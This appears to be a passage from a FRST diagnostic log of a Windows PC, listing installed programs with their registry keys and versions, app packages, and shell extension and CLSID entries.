Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27033 (HKLM-x32\...\{624ba875-fdfc-4efa-9c66-b170dfebc3ec}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1104.625 - Microsoft Corporation)
MMFonts (HKLM-x32\...\{1DD5D3E6-8DF5-4657-8825-713C499CDCC0}) (Version: 1.1.1.1 - MakeMusic, Inc.)
Mozilla Firefox 61.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 61.0.2 (x86 en-US)) (Version: 61.0.2 - Mozilla)
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0.2 - Mozilla)
Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich)
MSI Development Tools (HKLM-x32\...\{577FB968-1AAC-A315-93D6-419725A69F36}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments)
Network Addon Mod (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Network Addon Mod) (Version: 36 - The NAM Team)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
NovaGOPlayer 7.3.3 (HKLM-x32\...\89399A59-11C3-4EBC-A59E-FBD13021BC07_is1) (Version: 7.3.3 - Forthnet Media SA)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.15 - NVIDIA Corporation) Hidden
NVIDIA 3D Vision Controller Driver 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 397.93 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.19.0.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.19.0.94 - NVIDIA Corporation)
NVIDIA Graphics Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 397.93 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OANDA - MetaTrader (HKLM-x32\...\OANDA - MetaTrader) (Version: 4.00 - MetaQuotes Software Corp.)
OANDA Desktop (HKLM-x32\...\{1DAF3BB8-E27F-4698-9D7C-270985AA3BCE}) (Version: 2.6.3 - OANDA)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0408-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) Hidden
PACE License Support Win64 (HKLM-x32\...\InstallShield_{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.)
PCM Native Reverb VST Plug-in (HKLM-x32\...\{B4691C58-2A6A-4AFA-960E-AEB767639E44}) (Version: 1.0.0 - Lexicon) Hidden
PCM Native Reverb VST Plug-in (HKLM-x32\...\PCM Native Reverb VST Plug-in) (Version:  - Lexicon)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.2 - pdfforge GmbH)
PMDG 737 8900 NGX Base Package FSX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.10.6436 - PMDG Simulations, LLC.)
PureSync (HKLM-x32\...\{728DB5F9-AFAC-4027-B0A0-4194D89328E4}) (Version: 4.7.3 - Jumping Bytes)
qBittorrent 4.1.6 (HKLM-x32\...\qBittorrent) (Version: 4.1.6 - The qBittorrent project)
Quick Search 5.28.1.101 (HKLM-x32\...\Quick Search) (Version: 5.28.1.101 - Glarysoft Ltd)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RapidMiner Studio (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\RapidMiner Studio) (Version: 7.6.1.0 - RapidMiner)
RealAir Turbine Duke (HKLM\...\Turbine Duke07.1.10.35) (Version: 07.1.10.35 - RealAir Simulations)
Revolution DB Master 19 Beta 1 (HKLM-x32\...\Revolution DB Master 19_is1) (Version:  - FIFA MASTER)
REX 4 - Weather Architect (HKLM-x32\...\{1D59EFDF-0A58-4FF9-A468-A1190F1FAFEB}) (Version: 4.0.2015.0717 - REX Game Studios, LLC.)
rtpMIDIBlockLegacy (HKLM-x32\...\{FD937297-84C3-41A5-B5DF-1FAEEE669D68}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden
Sandboxie 5.30 (64-bit) (HKLM\...\Sandboxie) (Version: 5.30 - Sandboxie Holdings, LLC)
Scid vs PC 4.18 (HKLM-x32\...\Scid vs PC_is1) (Version: 4.18 - Steven Atkinson)
Screen Protractor (HKLM-x32\...\Screen Protractor) (Version: 4.0 - Iconico)
SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
SimCity 4 Deluxe Edition (HKLM-x32\...\GOGPACKSC4_is1) (Version: 2.0.0.8 - GOG.com)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - Krzysztof Kowalczyk)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
teVirtualMIDI64 (HKLM\...\{9084640A-366B-4C44-BDB1-74864B460B13}) (Version: 1.2.10.38 - Tobias Erichsen) Hidden
thinkorswim (HKLM\...\9968-4488-2169-7623) (Version: desktop - thinkorswim, Inc)
Traffic Simulator Configuration Tool (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Traffic Simulator Configuration Tool) (Version:  - )
TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden
UltraSearch V2.3 (64 bit) (HKLM\...\UltraSearch_is1) (Version: 2.3 - JAM Software)
Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS)
Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{BE2D1829-B45D-4D78-BF02-4076B86AC57C}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{A46D1F7A-BA32-2375-EF97-4975E594A7E7}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{413A1F9C-9349-4847-610E-BAB177A48ADE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{E2EA2702-534B-D6C1-5AC4-724E3CE7B2D9}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal Patch Finder version 1.5 (HKLM-x32\...\{88FBB3D2-C9A5-41E4-88B8-3F4F1722E7D1}_is1) (Version: 1.5 - Hypercube Softwares)
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9C4F3AF4-21D8-43BD-A69C-517BB96012CF}) (Version: 2.12.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM-x32\...\{B302EECB-0DA5-46E6-8A58-127440F22CF1}) (Version: 1.7.0.0 - Microsoft Corporation) Hidden
VBSBeautifier (remove only) (HKLM-x32\...\VBSBeautifier) (Version:  - )
vcpp_crt.redist.clickonce (HKLM-x32\...\{253D6AD3-5786-4B3B-B4E1-E082482A1F26}) (Version: 14.16.27033 - Microsoft Corporation) Hidden
VeraCrypt (HKLM-x32\...\VeraCrypt) (Version: 1.21 - IDRIX)
Viber (HKLM-x32\...\{32AF88A9-E104-4306-8B68-CB92FFD2CAD6}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Hidden
Viber (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\{9097b5b3-1f2b-4ff7-a350-97a76bb76fb8}) (Version: 11.0.0.42 - Viber Media S.a.r.l)
Visual Studio Community 2017 (HKLM-x32\...\fba7c5bd) (Version: 15.9.28307.905 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VoiceBot 3.0 (HKLM-x32\...\2BB5202A-885B-454F-8624-FD3310CD3225_is1) (Version: 3.0.0.0 - Binary Fortress Software)
VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Weka 3.8.3 (HKLM\...\Weka 3.8.3) (Version: 3.8.3 - Machine Learning Group, University of Waikato, Hamilton, NZ)
WinAppDeploy (HKLM-x32\...\{03343DEA-224B-E9B6-1FBB-E637E6BC6BAA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinAutomation (HKLM\...\{67F5E390-8E09-4AE4-B7F2-705AFD23D86D}) (Version: 6.0.2.4227 - Softomotive Ltd) Hidden
WinAutomation (HKLM-x32\...\WinAutomation) (Version: 6.0.2.4227 - Softomotive Ltd)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22211 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{E1C6F438-7C50-41F5-8B47-3CC96D397CA3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows Software Development Kit - Windows 10.0.15063.674 (HKLM-x32\...\{6824cee4-b358-4633-b82c-5f20894af8e2}) (Version: 10.1.15063.674 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D8AA52A2-81E2-BB84-AAF9-C487C586CC15}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{5715A2A6-E637-81E3-464D-3F0F999E506A}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{2B8614A6-D0C1-CFE0-9311-7AF9227DC9BA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{409D68FF-37DD-F8F4-A60F-30BEAA4AA4CE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{3617F573-CF51-0F5A-063F-B272F98D0522}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{FDE59EF8-D43D-F9DA-5B0C-CC9C90DB0335}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{87CC4887-0873-F87B-D804-6A78B07DC1F5}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{D62E0DD5-9853-C09C-AE15-D02988503C60}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
wxWidgets 3.0.4 (HKLM-x32\...\wxWidgets_is1) (Version:  - wxWidgets)
X-Mouse Button Control 2.18.8 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.18.8 - Highresolution Enterprises)
ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic)

Packages:
=========
Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12228.20206.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.33.13094.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) [MS Ad]
Microsoft Phone Companion -> C:\Program Files\WindowsApps\Microsoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe [2018-11-13] (Microsoft Corporation)
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.11052.0_x64__8wekyb3d8bbwe [2019-11-10] (Microsoft Studios) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.33.13253.0_x64__8wekyb3d8bbwe [2019-11-23] (Microsoft Corporation) [MS Ad]
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{23066764-9BDD-4FBD-8B1F-F4547CF2684F}\InprocServer32 -> C:\Users\SR\AppData\Local\Microsoft\OneDrive\18.070.0405.0002\amd64\FileSyncShell64.dll => No File
CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\SR\Dropbox [2018-01-03 12:23]
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
